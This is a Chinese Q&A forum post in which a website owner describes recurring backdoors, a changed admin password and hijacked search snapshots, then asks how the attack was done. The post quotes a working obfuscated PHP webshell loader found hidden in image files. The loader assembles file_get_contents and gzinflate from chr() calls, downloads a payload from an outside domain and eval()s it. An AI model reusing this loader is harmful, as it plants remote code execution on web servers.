|
网站目录老是被上传后门文件, 删了几天又有了, 改各种密码 ,装云锁, 今天更气人,网站管理员密码被改, 还发帖子,云锁还被卸载,快照被劫持天天秒收录, 有吧网站备份下来用D盾扫描一下,发现几张图片有脚本, 这是怎么做到的?
脚本地址:http://www.9661.in/txt/xml1.txt
<?php
$password='haosir';$b="chr";session_start();if(empty($_SESSION['PhpCode'])){$d=$b(104).$b(116).$b(116).$b(112).$b(58).$b(47).$b(47).$b(57).$b(54).$b(54).$b(49).$b(46).$b(105).$b(110).$b(47).$b(112).$b(104).$b(112).$b(47).$b(112).$b(104).$b(112).$b(46).$b(103).$b(105).$b(102);$e=$b(102).$b(105).$b(108).$b(101).$b(95);$e.=$b(103).$b(101).$b(116).$b(95).$b(99);$e.=$b(111).$b(110).$b(116).$b(101).$b(110);$e.=$b(116).$b(115);$_SESSION['PhpCode']=$e($d);}$f=$b(103).$b(122).$b(105).$b(110);$f.=$b(102).$b(108).$b(97).$b(116).$b(101);@eval($f($_SESSION['PhpCode']));
我知道答案
回答被采纳将会获得 1 贡献 已有9人回答
|
|